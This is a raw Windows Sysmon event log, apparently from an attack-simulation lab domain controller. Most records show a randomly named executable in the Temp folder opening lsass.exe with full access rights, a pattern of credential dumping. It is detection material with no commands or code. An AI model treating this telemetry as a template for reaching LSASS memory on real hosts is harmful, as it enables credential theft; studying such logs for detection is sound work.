15:52:59.169{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005335Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.153{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe40400x00000161B50D082C-- 10341000x80000000000000005334Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.153{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005333Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.137{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe42280x00000161B50D082C-- 10341000x80000000000000005332Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.137{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005331Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.122{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe39880x00000161B50D082C-- 10341000x80000000000000005330Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.122{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005329Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.106{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe25080x00000161B50D082C-- 10341000x80000000000000005328Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.106{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005327Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.075{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe39600x00000161B50D082C-- 10341000x80000000000000005326Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.075{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005325Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.059{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe45280x00000161B50D082C-- 10341000x80000000000000005324Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.059{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005323Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.043{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe45760x00000161B50D082C-- 10341000x80000000000000005322Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.043{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005321Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.028{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe45200x00000161B50D082C-- 10341000x80000000000000005320Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.028{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 824800x80000000000000005319Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7CDA-5FA1-0D01-000000008801}4252C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\System32\lsass.exe45560x00000161B50D082C-- 10341000x80000000000000005318Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7CDA-5FA1-0D01-000000008801}42523740C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\644c305e-30f4-470b-b616-d924c3206d1d.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005317Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDB-5FA1-1701-000000008801}4572C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005316Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005315Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005314Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005313Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005312Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005311Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005310Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005309Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005308Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CDB-5FA1-1701-000000008801}4572C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005307Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005306Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.012{D28789B6-7CDB-5FA1-1601-000000008801}25884544C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7CDB-5FA1-1701-000000008801}4572C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005305Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.017{D28789B6-7CDB-5FA1-1701-000000008801}4572C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CDB-5FA1-1601-000000008801}2588C:\Program 